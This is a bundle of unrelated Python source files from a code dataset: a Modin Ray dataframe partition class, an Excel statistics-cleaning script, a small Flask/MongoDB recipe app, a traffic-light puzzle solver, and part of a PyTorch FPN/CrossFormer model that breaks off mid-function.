ray.ObjectRef or str, optional\n IP address of the node that holds the wrapped ``pandas.DataFrame``, or a reference to it.\n call_queue : list\n Call queue that needs to be executed on the wrapped ``pandas.DataFrame``.\n \"\"\"\n\n def __init__(self, object_id, length=None, width=None, ip=None, call_queue=None):\n assert isinstance(object_id, ObjectIDType)\n\n self.oid = object_id\n if call_queue is None:\n call_queue = []\n self.call_queue = call_queue\n self._length_cache = length\n self._width_cache = width\n self._ip_cache = ip\n\n def get(self):\n \"\"\"\n Get the object wrapped by this partition out of the Plasma store.\n\n Returns\n -------\n pandas.DataFrame\n The object from the Plasma store.\n \"\"\"\n if len(self.call_queue):\n self.drain_call_queue()\n return ray.get(self.oid)\n\n def apply(self, func, *args, **kwargs):\n \"\"\"\n Apply a function to the object wrapped by this partition.\n\n Parameters\n ----------\n func : callable or ray.ObjectRef\n A function to apply.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n\n Notes\n -----\n It does not matter if `func` is callable or a ``ray.ObjectRef``. Ray will\n handle it correctly either way. 
The keyword arguments are sent as a dictionary.\n \"\"\"\n oid = self.oid\n call_queue = self.call_queue + [(func, args, kwargs)]\n if len(call_queue) > 1:\n result, length, width, ip = apply_list_of_funcs.remote(call_queue, oid)\n else:\n # We handle `len(call_queue) == 1` in a different way because\n # this dramatically improves performance.\n func, args, kwargs = call_queue[0]\n result, length, width, ip = apply_func.remote(oid, func, *args, **kwargs)\n return PandasOnRayFramePartition(result, length, width, ip)\n\n def add_to_apply_calls(self, func, *args, **kwargs):\n \"\"\"\n Add a function to the call queue.\n\n Parameters\n ----------\n func : callable or ray.ObjectRef\n Function to be added to the call queue.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n\n Notes\n -----\n It does not matter if `func` is callable or a ``ray.ObjectRef``. Ray will\n handle it correctly either way. The keyword arguments are sent as a dictionary.\n \"\"\"\n return PandasOnRayFramePartition(\n self.oid, call_queue=self.call_queue + [(func, args, kwargs)]\n )\n\n def drain_call_queue(self):\n \"\"\"Execute all operations stored in the call queue on the object wrapped by this partition.\"\"\"\n if len(self.call_queue) == 0:\n return\n oid = self.oid\n call_queue = self.call_queue\n if len(call_queue) > 1:\n (\n self.oid,\n self._length_cache,\n self._width_cache,\n self._ip_cache,\n ) = apply_list_of_funcs.remote(call_queue, oid)\n else:\n # We handle `len(call_queue) == 1` in a different way because\n # this dramatically improves performance.\n func, args, kwargs = call_queue[0]\n (\n self.oid,\n self._length_cache,\n self._width_cache,\n self._ip_cache,\n ) = apply_func.remote(oid, func, *args, **kwargs)\n self.call_queue = []\n\n def wait(self):\n \"\"\"Wait for computations on the object wrapped by the partition to complete.\"\"\"\n self.drain_call_queue()\n ray.wait([self.oid])\n\n def __copy__(self):\n \"\"\"\n Create a copy of this partition.\n\n Returns\n -------\n PandasOnRayFramePartition\n A copy of this partition.\n \"\"\"\n return PandasOnRayFramePartition(\n self.oid,\n length=self._length_cache,\n width=self._width_cache,\n ip=self._ip_cache,\n call_queue=self.call_queue,\n )\n\n def to_pandas(self):\n \"\"\"\n Convert the object wrapped by this partition to a ``pandas.DataFrame``.\n\n Returns\n -------\n pandas.DataFrame\n \"\"\"\n dataframe = self.get()\n assert type(dataframe) is pandas.DataFrame or type(dataframe) is pandas.Series\n return dataframe\n\n def to_numpy(self, **kwargs):\n \"\"\"\n Convert the object wrapped by this partition to a NumPy array.\n\n Parameters\n ----------\n **kwargs : dict\n Additional keyword arguments to be passed in ``to_numpy``.\n\n Returns\n -------\n np.ndarray\n \"\"\"\n return self.apply(lambda df, **kwargs: df.to_numpy(**kwargs)).get()\n\n def mask(self, row_indices, col_indices):\n \"\"\"\n Lazily create a mask that extracts the indices provided.\n\n Parameters\n ----------\n row_indices : list-like, slice or label\n The indices for the rows to extract.\n col_indices : list-like, slice or label\n The indices for the columns to extract.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n new_obj = super().mask(row_indices, col_indices)\n if isinstance(row_indices, slice) and isinstance(\n 
self._length_cache, ObjectIDType\n ):\n new_obj._length_cache = compute_sliced_len.remote(\n row_indices, self._length_cache\n )\n if isinstance(col_indices, slice) and isinstance(\n self._width_cache, ObjectIDType\n ):\n new_obj._width_cache = compute_sliced_len.remote(\n col_indices, self._width_cache\n )\n return new_obj\n\n @classmethod\n def put(cls, obj):\n \"\"\"\n Put an object into Plasma store and wrap it with partition object.\n\n Parameters\n ----------\n obj : any\n An object to be put.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n return PandasOnRayFramePartition(ray.put(obj), len(obj.index), len(obj.columns))\n\n @classmethod\n def preprocess_func(cls, func):\n \"\"\"\n Put a function into the Plasma store to use in ``apply``.\n\n Parameters\n ----------\n func : callable\n A function to preprocess.\n\n Returns\n -------\n ray.ObjectRef\n A reference to `func`.\n \"\"\"\n return ray.put(func)\n\n def length(self):\n \"\"\"\n Get the length of the object wrapped by this partition.\n\n Returns\n -------\n int\n The length of the object.\n \"\"\"\n if self._length_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._length_cache, self._width_cache = get_index_and_columns.remote(\n self.oid\n )\n if isinstance(self._length_cache, ObjectIDType):\n self._length_cache = ray.get(self._length_cache)\n return self._length_cache\n\n def width(self):\n \"\"\"\n Get the width of the object wrapped by the partition.\n\n Returns\n -------\n int\n The width of the object.\n \"\"\"\n if self._width_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._length_cache, self._width_cache = get_index_and_columns.remote(\n self.oid\n )\n if isinstance(self._width_cache, ObjectIDType):\n self._width_cache = ray.get(self._width_cache)\n return self._width_cache\n\n def ip(self):\n \"\"\"\n Get the node IP address of the object wrapped by this partition.\n\n Returns\n -------\n str\n IP address of the node that holds the data.\n \"\"\"\n if self._ip_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._ip_cache = self.apply(lambda df: df)._ip_cache\n if isinstance(self._ip_cache, ObjectIDType):\n self._ip_cache = ray.get(self._ip_cache)\n return self._ip_cache\n\n @classmethod\n def _length_extraction_fn(cls):\n \"\"\"\n Return the function that computes the length of the object wrapped by this partition.\n\n Returns\n -------\n callable\n The function that computes the length of the object wrapped by this partition.\n \"\"\"\n return length_fn_pandas\n\n @classmethod\n def _width_extraction_fn(cls):\n \"\"\"\n Return the function that computes the width of the object wrapped by this partition.\n\n Returns\n -------\n callable\n The function that computes the width of the object wrapped by this partition.\n \"\"\"\n return width_fn_pandas\n\n @classmethod\n def empty(cls):\n \"\"\"\n Create a new partition that wraps an empty pandas DataFrame.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n return cls.put(pandas.DataFrame())\n\n\n@ray.remote(num_returns=2)\ndef get_index_and_columns(df):\n \"\"\"\n Get the number of rows and columns of a pandas DataFrame.\n\n Parameters\n ----------\n df : pandas.DataFrame\n A pandas DataFrame which dimensions are needed.\n\n Returns\n -------\n int\n The number of rows.\n int\n The number of columns.\n \"\"\"\n return len(df.index), 
len(df.columns)\n\n\n@ray.remote(num_returns=4)\ndef apply_func(partition, func, *args, **kwargs): # pragma: no cover\n \"\"\"\n Execute a function on the partition in a worker process.\n\n Parameters\n ----------\n partition : pandas.DataFrame\n A pandas DataFrame the function needs to be executed on.\n func : callable\n Function that needs to be executed on the partition.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n pandas.DataFrame\n The resulting pandas DataFrame.\n int\n The number of rows of the resulting pandas DataFrame.\n int\n The number of columns of the resulting pandas DataFrame.\n str\n The node IP address of the worker process.\n \"\"\"\n try:\n result = func(partition, *args, **kwargs)\n # Sometimes Arrow forces us to make a copy of an object before we operate on it. We\n # don't want the error to propagate to the user, and we want to avoid copying unless\n # we absolutely have to.\n except ValueError:\n result = func(partition.copy(), *args, **kwargs)\n return (\n result,\n len(result) if hasattr(result, \"__len__\") else 0,\n len(result.columns) if hasattr(result, \"columns\") else 0,\n get_node_ip_address(),\n )\n\n\n@ray.remote(num_returns=4)\ndef apply_list_of_funcs(funcs, partition): # pragma: no cover\n \"\"\"\n Execute all operations stored in the call queue on the partition in a worker process.\n\n Parameters\n ----------\n funcs : list\n A call queue that needs to be executed on the partition.\n partition : pandas.DataFrame\n A pandas DataFrame the call queue needs to be executed on.\n\n Returns\n -------\n pandas.DataFrame\n The resulting pandas DataFrame.\n int\n The number of rows of the resulting pandas DataFrame.\n int\n The number of columns of the resulting pandas DataFrame.\n str\n The node IP address of the worker process.\n \"\"\"\n\n def deserialize(obj):\n if isinstance(obj, ObjectIDType):\n return ray.get(obj)\n elif isinstance(obj, (tuple, list)) and any(\n isinstance(o, ObjectIDType) for o in obj\n ):\n return ray.get(list(obj))\n elif isinstance(obj, dict) and any(\n isinstance(val, ObjectIDType) for val in obj.values()\n ):\n return dict(zip(obj.keys(), ray.get(list(obj.values()))))\n else:\n return obj\n\n for func, args, kwargs in funcs:\n func = deserialize(func)\n args = deserialize(args)\n kwargs = deserialize(kwargs)\n try:\n partition = func(partition, *args, **kwargs)\n # Sometimes Arrow forces us to make a copy of an object before we operate on it. 
We\n # don't want the error to propagate to the user, and we want to avoid copying unless\n # we absolutely have to.\n except ValueError:\n partition = func(partition.copy(), *args, **kwargs)\n\n return (\n partition,\n len(partition) if hasattr(partition, \"__len__\") else 0,\n len(partition.columns) if hasattr(partition, \"columns\") else 0,\n get_node_ip_address(),\n )\n","sub_path":"modin/engines/ray/pandas_on_ray/frame/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":15513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"571339496","text":"# -*- coding: utf-8 -*-\nimport func\nimport os\nimport datetime\nimport pandas as pd\nimport pickle\n\n\n# path to the already-labeled Excel tables\nExcelPath = r'D:\\Teacher Song\\spatil_time_label_test\\补充数据测试\\excel'\n# Excel table of the supplemented place-name library\ncountyExcel = r'D:\\Teacher Song\\spatil_time_label_test\\补充数据测试\\地名库指标库\\地名库补充后.xls'\n# output path\noutPath = r'D:\\Teacher Song\\spatil_time_label_test\\outExcel'\n\nyearList = list(map(str, range(2011, 2016))) # valid years\nattributesList = ['POPYE', 'FIX', 'RESID', 'VPOP', 'CPOP', 'GDP', 'GDP1', 'GDP2', 'GDP3'] # valid field names\ncountyDict = func.getCountyDict(countyExcel) # get the place-name dictionary\n\nstartTime = datetime.datetime.now()\n\n# Save the place-name dictionary to a pickle file; it is needed when joining the shp data under Python 2.\npkl = open(outPath+'\\\\countyDict.pickle', 'wb')\npickle.dump(countyDict, pkl, protocol=2)\npkl.close()\n\n# pkl = open(outPath+'\\\\countyDict.pickle', 'rb')\n# countyDict = pickle.load(pkl)\n# pkl.close()\n\ncountyList = countyDict.keys()\nlog = outPath+\"\\\\log.txt\" # create a txt file to collect the Excel tables that raise errors\nfiles = open(log, \"w\")\n\nfileList = os.listdir(ExcelPath)\nStandarDataList = []\n\nfor f in fileList:\n if '.xls' in f[-4:]:\n fullPath = os.path.join(ExcelPath, f)\n print(fullPath)\n try:\n startPoint = func.getStartPoint(fullPath) # get the row/column of the keyword and its value\n df = func.clearData(fullPath, startPoint) # drop the redundant rows and columns\n ExcelType = func.getExcelType(startPoint) # get the type of the Excel table\n dataList = func.getStandardData(df, ExcelType, startPoint) # store the records one by one in dataList\n # normalize each record to [year, county, attributes, values]; keep it in StandarDataList if it is valid\n for data in dataList:\n # print(data)\n data = func.clearStandarData(data, countyDict, countyList, yearList, attributesList)\n # print(data)\n if data != []:\n StandarDataList.append(data)\n except:\n # if anything above fails, record the failing Excel file name in 'log.txt'\n files.write(fullPath+'\\n')\n\n# data = open(outPath+'\\\\StandarDataList.pickle', 'wb')\n# pickle.dump(StandarDataList, data)\n# data.close()\n\n# data = open(outPath+'\\\\StandarDataList.pickle', 'rb')\n# StandarDataList = pickle.load(data)\n# data.close()\n\n# convert StandarDataList to a DataFrame and export it as an Excel table named AStandarData\ndf = pd.DataFrame(StandarDataList, columns=['year', 'county', 'countyID', 'attributes', 'value'])\ndf.to_excel(outPath+'\\\\AStandarData.xls')\n\n# split the data by year; pivot each year's DataFrame via DataFrame.pivot() into a table with countyID\n# as the index, attributes as the columns, and value as the values, and export one Excel file per year\nfor y in yearList:\n dfyear = df[df.year == y]\n dfyear = dfyear.pivot(index='countyID', columns='attributes', values='value')\n print(dfyear)\n dfyear.to_excel(outPath+'\\\\excelBy{}.xls'.format(y))\n\nfiles.write(str(datetime.datetime.now()))\nfiles.close() # write the date into log.txt, then close the file\n\nendTime = datetime.datetime.now()\nprint('use time: {} s'.format(str((endTime-startTime).seconds)))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
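The per-year export above hinges on `DataFrame.pivot`. A tiny self-contained sketch of that reshaping step, with toy data but the same column names the script uses:

import pandas as pd

rows = [
    ["2011", "A", "01", "GDP", 10.0],
    ["2011", "B", "02", "GDP", 20.0],
    ["2011", "A", "01", "POPYE", 1.5],
]
df = pd.DataFrame(rows, columns=["year", "county", "countyID", "attributes", "value"])
# one row per (countyID, attribute) pair -> wide table with counties as the index
wide = df.pivot(index="countyID", columns="attributes", values="value")
print(wide)   # columns GDP / POPYE, one row per countyID, NaN where no record exists

+{"seq_id":"420409914","text":"import os\nfrom 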
flask import (\n Flask, flash, render_template, \n redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\n@app.route(\"/get_recipes\")\ndef get_recipes():\n recipes = mongo.db.recipes.find()\n return render_template(\"recipes.html\", recipes=recipes)\n\n@app.route(\"/add_recipe\")\ndef add_recipe():\n category_list = mongo.db.categories.find()\n print(category_list)\n # import pdb ; pdb.set_trace()\n return render_template(\"add_recipe.html\", categories=category_list)\n\n@app.route(\"/insert_recipe\", methods=[\"POST\"])\ndef insert_recipe():\n recipes = mongo.db.recipes\n recipes.insert_one(request.form.to_dict())\n return redirect(url_for(\"get_recipes\"))\n\n@app.route(\"/edit_recipe/<recipe_id>\")\ndef edit_recipe(recipe_id):\n the_recipe = mongo.db.recipes.find_one({\"_id\": ObjectId(recipe_id)})\n all_categories = mongo.db.categories.find()\n return render_template(\"editrecipe.html\", recipe=the_recipe, categories=all_categories)\n\n@app.route('/update_recipe/<recipe_id>', methods=[\"POST\"])\ndef update_recipe(recipe_id):\n recipes = mongo.db.recipes\n recipes.update( {'_id': ObjectId(recipe_id)},\n { 'recipe_name':request.form.get('recipe_name'),\n 'recipe_category':request.form.get('recipe_category'),\n 'recipe_ingredients': request.form.get('recipe_ingredients'),\n 'recipe_directions': request.form.get('recipe_directions'),\n })\n return redirect(url_for(\"get_recipes\"))\n\n@app.route('/delete_recipe/<recipe_id>')\ndef delete_recipe(recipe_id):\n\tmongo.db.recipes.remove({'_id': ObjectId(recipe_id)})\n\treturn redirect(url_for('get_recipes'))\n\n@app.route('/get_categories')\ndef get_categories():\n return render_template('categories.html',\n categories=mongo.db.categories.find())\n\n@app.route('/edit_category/<category_id>')\ndef edit_category(category_id):\n return render_template('editcategory.html', \n category=mongo.db.categories.find_one({'_id': ObjectId(category_id)}))\n\n@app.route('/update_category/<category_id>', methods=['GET', 'POST'] )\ndef update_category(category_id):\n mongo.db.categories.update(\n {'_id': ObjectId(category_id)},\n {'name': request.form.get('name')})\n return redirect(url_for('get_categories'))\n\n@app.route('/delete_category/<category_id>')\ndef delete_category(category_id):\n\tmongo.db.categories.remove({'_id': ObjectId(category_id)})\n\treturn redirect(url_for('get_categories'))\n\n@app.route('/insert_category', methods=[\"POST\"])\ndef insert_category():\n categories = mongo.db.categories\n categories.insert_one(request.form.to_dict())\n return redirect(url_for(\"get_categories\"))\n\n@app.route('/add_category')\ndef add_category():\n return render_template('addcategory.html') \n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\", 5000)),\n debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
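The angle-bracket converters restored in the routes above (they had been stripped from the original text, although the view functions still took the arguments) are how Flask binds URL segments to view arguments. A minimal standalone sketch, separate from the recipe app:

from flask import Flask

demo = Flask(__name__)

@demo.route("/edit_recipe/<recipe_id>")
def edit_recipe(recipe_id):
    # the matched URL segment arrives as a string argument
    return f"editing {recipe_id}"

client = demo.test_client()
print(client.get("/edit_recipe/42").data)  # b'editing 42'

+{"seq_id":"202581859","text":"#Author: Megan West\r\n#Title: Aneo Sponsored Puzzle: Traffic Lights\r\n#Goal of this puzzle: You enter a section of road and you plan to rely entirely\r\n#on your cruise control to cross through the area without having to stop or\r\n#slow down. 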
The goal is to find the maximum speed (without speeding) that will\r\n#allow you to cross all the traffic lights while they are green.\r\n#Warning: You can't cross a traffic light the second it turns red!\r\n#Your vehicle enters the zone directly at the speed programmed on the cruise\r\n#control which ensures that it does not change.\r\n\r\n\r\nimport sys\r\nimport math\r\n\r\nSPEED_LIMIT_KPH = int(input())\r\nLIGHT_COUNT = int(input())\r\nSPEED_LIMIT_MPS = round(SPEED_LIMIT_KPH * (1000.0/3600.0), 0)\r\n\r\n\r\n#print(\"Speed limit in KPH: %d\" % SPEED_LIMIT_KPH)\r\n#print(\"Speed limit in meters per second = %f\" % SPEED_LIMIT_MPS)\r\n#print(\"Number of lights = %d\" % LIGHT_COUNT)\r\n\r\n#did not choose to add input validation loops to this code.\r\n\r\ndef get_light_stats():\r\n stats_list = []\r\n distance, duration = [int(j) for j in input().split()]\r\n stats_list.append(distance)\r\n #print(\"distance: %d\" % stats_list[0])\r\n stats_list.append(duration)\r\n #print(\"duration: %d\" % stats_list[1])\r\n return stats_list\r\n\r\ndef mps_to_kph(mps):\r\n kph = mps * (3600/1000.0)\r\n return kph\r\n\r\ndef kph_to_mps(kph):\r\n mps = kph * (1000.0/3600)\r\n return mps\r\n\r\ndef get_state(speed, distance, duration):\r\n #if speed > 50 and speed < 80: print(\"speed before conversion: %f\" % speed)\r\n mps = kph_to_mps(speed)\r\n #print(\"speed after conversion: %f\" % mps)\r\n period = duration * 2\r\n #print(\"period is %f\" % period)\r\n\r\n time_elapsed = distance / mps\r\n #print(round(time_elapsed, 2))\r\n\r\n time_elapsed %= period  #wrap into the current signal cycle (same as repeatedly subtracting whole periods)\r\n\r\n if time_elapsed < (period / 2.0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef calc_max_speed(speed, lights, light):\r\n if light >= LIGHT_COUNT: return speed\r\n if speed <= 0: return speed\r\n\r\n distance = lights[light][0]\r\n duration = lights[light][1]\r\n\r\n #print(speed, distance, duration)\r\n\r\n state = get_state(speed, distance, duration)\r\n\r\n #print(\"The state at light %d, speed %f, is %s\" % (light, speed, state))\r\n\r\n if state:\r\n return calc_max_speed(speed, lights, light + 1)\r\n\r\n return calc_max_speed(speed - 1.0, lights, light=0)\r\n\r\ndef print_max_speed(speed):\r\n\r\n #initialize list of lights\r\n lights = []\r\n\r\n #populate the list of lists\r\n for light in range(LIGHT_COUNT):\r\n lights.append(get_light_stats())\r\n\r\n #start testing using speed_limit, so that we reach max speed faster.\r\n max_speed = round(calc_max_speed(speed, lights, 0), 0)\r\n print(int(max_speed))\r\n\r\nprint_max_speed(SPEED_LIMIT_KPH)\r\n","sub_path":"TrafficLights.py","file_name":"TrafficLights.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
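The green/red test in `get_state` reduces to modular arithmetic: a light with duration d repeats with period 2d, and the car crosses on green exactly when its arrival time modulo 2d falls in [0, d). A worked check under those assumptions (standalone, not part of the puzzle solution above):

def is_green(speed_kph, distance_m, duration_s):
    mps = speed_kph * 1000.0 / 3600.0
    return (distance_m / mps) % (2 * duration_s) < duration_s

# light 300 m away, green for 15 s -> 30 s cycle:
# at 72 km/h (20 m/s) arrival is 15.0 s, and 15.0 % 30 is not < 15 -> red (just turned);
# at 90 km/h (25 m/s) arrival is 12.0 s, and 12.0 % 30 < 15 -> green.
assert not is_green(72, 300, 15)
assert is_green(90, 300, 15)

+{"seq_id":"546431218","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# @file : crossformer.py\n# @time : 2021/08/09 09:22:54\n# @authors : daoming zong, chunya liu\n# @version : 1.0\n# @contact : zongdaoming@sensetime.com; liuchunya@sensetime.com\n# @desc : None\n# Copyright (c) 2021 SenseTime IRDC Group. 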
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport math\nimport copy\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom mmcv.cnn import ConvModule\nfrom typing import Optional, List\nfrom mmcv.runner import BaseModule\nfrom collections import OrderedDict\nimport torch.utils.checkpoint as checkpoint\nfrom utils.log_helper import default_logger as logger\nfrom timm.models.layers import DropPath, to_2tuple, trunc_normal_\n\nNEG_INF = -1000000\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\nclass FPN(BaseModule):\n r\"\"\"Feature Pyramid Network.\n This is an implementation of paper `Feature Pyramid Networks for Object\n Detection <https://arxiv.org/abs/1612.03144>`_.\n Args:\n in_channels (List[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale)\n num_outs (int): Number of output scales.\n start_level (int): Index of the start input backbone level used to\n build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive) to\n build the feature pyramid. Default: -1, which means the last level.\n add_extra_convs (bool | str): If bool, it decides whether to add conv\n layers on top of the original feature maps. Default to False.\n If True, it is equivalent to `add_extra_convs='on_input'`.\n If str, it specifies the source feature map of the extra convs.\n Only the following options are allowed\n - 'on_input': Last feat map of neck inputs (i.e. backbone feature).\n - 'on_lateral': Last feature map after lateral convs.\n - 'on_output': The last output feature map after fpn convs.\n relu_before_extra_convs (bool): Whether to apply relu before the extra\n conv. Default: False.\n no_norm_on_lateral (bool): Whether to apply norm on lateral.\n Default: False.\n conv_cfg (dict): Config dict for convolution layer. Default: None.\n norm_cfg (dict): Config dict for normalization layer. Default: None.\n act_cfg (str): Config dict for activation layer in ConvModule.\n Default: None.\n upsample_cfg (dict): Config dict for interpolate layer.\n Default: `dict(mode='nearest')`\n init_cfg (dict or list[dict], optional): Initialization config dict.\n Example:\n >>> import torch\n >>> in_channels = [2, 3, 5, 7]\n >>> scales = [340, 170, 84, 43]\n >>> inputs = [torch.rand(1, c, s, s)\n ... for c, s in zip(in_channels, scales)]\n >>> self = FPN(in_channels, 11, len(in_channels)).eval()\n >>> outputs = self.forward(inputs)\n >>> for i in range(len(outputs)):\n ... 
print(f'outputs[{i}].shape = {outputs[i].shape}')\n outputs[0].shape = torch.Size([1, 11, 340, 340])\n outputs[1].shape = torch.Size([1, 11, 170, 170])\n outputs[2].shape = torch.Size([1, 11, 84, 84])\n outputs[3].shape = torch.Size([1, 11, 43, 43])\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n num_outs,\n start_level=0,\n end_level=-1,\n add_extra_convs=False,\n relu_before_extra_convs=False,\n no_norm_on_lateral=False,\n conv_cfg=None,\n norm_cfg=None,\n act_cfg=None,\n upsample_cfg=dict(mode='nearest'),\n init_cfg=dict(\n type='Xavier', layer='Conv2d', distribution='uniform')):\n super(FPN, self).__init__(init_cfg)\n assert isinstance(in_channels, list)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.num_ins = len(in_channels)\n self.num_outs = num_outs\n self.relu_before_extra_convs = relu_before_extra_convs\n self.no_norm_on_lateral = no_norm_on_lateral\n self.fp16_enabled = False\n self.upsample_cfg = upsample_cfg.copy()\n\n if end_level == -1:\n self.backbone_end_level = self.num_ins\n assert num_outs >= self.num_ins - start_level\n else:\n # if end_level < inputs, no extra level is allowed\n self.backbone_end_level = end_level\n assert end_level <= len(in_channels)\n assert num_outs == end_level - start_level\n self.start_level = start_level\n self.end_level = end_level\n self.add_extra_convs = add_extra_convs\n assert isinstance(add_extra_convs, (str, bool))\n if isinstance(add_extra_convs, str):\n # Extra_convs_source choices: 'on_input', 'on_lateral', 'on_output'\n assert add_extra_convs in ('on_input', 'on_lateral', 'on_output')\n elif add_extra_convs: # True\n self.add_extra_convs = 'on_input'\n\n self.lateral_convs = nn.ModuleList()\n self.fpn_convs = nn.ModuleList()\n\n for i in range(self.start_level, self.backbone_end_level):\n l_conv = ConvModule(\n in_channels[i],\n out_channels,\n 1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg if not self.no_norm_on_lateral else None,\n act_cfg=act_cfg,\n inplace=False)\n fpn_conv = ConvModule(\n out_channels,\n out_channels,\n 3,\n padding=1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg,\n inplace=False)\n\n self.lateral_convs.append(l_conv)\n self.fpn_convs.append(fpn_conv)\n\n # add extra conv layers (e.g., RetinaNet)\n extra_levels = num_outs - self.backbone_end_level + self.start_level\n if self.add_extra_convs and extra_levels >= 1:\n for i in range(extra_levels):\n if i == 0 and self.add_extra_convs == 'on_input':\n in_channels = self.in_channels[self.backbone_end_level - 1]\n else:\n in_channels = out_channels\n extra_fpn_conv = ConvModule(\n in_channels,\n out_channels,\n 3,\n stride=2,\n padding=1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg,\n inplace=False)\n self.fpn_convs.append(extra_fpn_conv)\n\n def forward(self, inputs):\n \"\"\"Forward function.\"\"\"\n assert len(inputs) == len(self.in_channels)\n\n # build laterals\n laterals = [\n lateral_conv(inputs[i + self.start_level])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n\n # build top-down path\n used_backbone_levels = len(laterals)\n for i in range(used_backbone_levels - 1, 0, -1):\n # In some cases, fixing `scale factor` (e.g. 
2) is preferred, but\n # it cannot co-exist with `size` in `F.interpolate`.\n if 'scale_factor' in self.upsample_cfg:\n laterals[i - 1] += F.interpolate(laterals[i],\n **self.upsample_cfg)\n else:\n prev_shape = laterals[i - 1].shape[2:]\n laterals[i - 1] += F.interpolate(\n laterals[i], size=prev_shape, **self.upsample_cfg)\n\n # build outputs\n # part 1: from original levels\n outs = [\n self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)\n ]\n # part 2: add extra levels\n if self.num_outs > len(outs):\n # use max pool to get more levels on top of outputs\n # (e.g., Faster R-CNN, Mask R-CNN)\n if not self.add_extra_convs:\n for i in range(self.num_outs - used_backbone_levels):\n outs.append(F.max_pool2d(outs[-1], 1, stride=2))\n # add conv layers on top of original feature maps (RetinaNet)\n else:\n if self.add_extra_convs == 'on_input':\n extra_source = inputs[self.backbone_end_level - 1]\n elif self.add_extra_convs == 'on_lateral':\n extra_source = laterals[-1]\n elif self.add_extra_convs == 'on_output':\n extra_source = outs[-1]\n else:\n raise NotImplementedError\n outs.append(self.fpn_convs[used_backbone_levels](extra_source))\n for i in range(used_backbone_levels + 1, self.num_outs):\n if self.relu_before_extra_convs:\n outs.append(self.fpn_convs[i](F.relu(outs[-1])))\n else:\n outs.append(self.fpn_convs[i](outs[-1]))\n return tuple(outs)\n\n\nclass DynamicPosBias(nn.Module):\n def __init__(self, dim, num_heads, residual):\n super().__init__()\n self.residual = residual\n self.num_heads = num_heads\n self.pos_dim = dim // 4\n self.pos_proj = nn.Linear(2, self.pos_dim)\n self.pos1 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.pos_dim),\n )\n self.pos2 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.pos_dim)\n )\n self.pos3 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.num_heads)\n )\n def forward(self, biases):\n if self.residual:\n pos = self.pos_proj(biases) # 2Gh-1 * 2Gw-1, heads\n pos = pos + self.pos1(pos)\n pos = pos + self.pos2(pos)\n pos = self.pos3(pos)\n 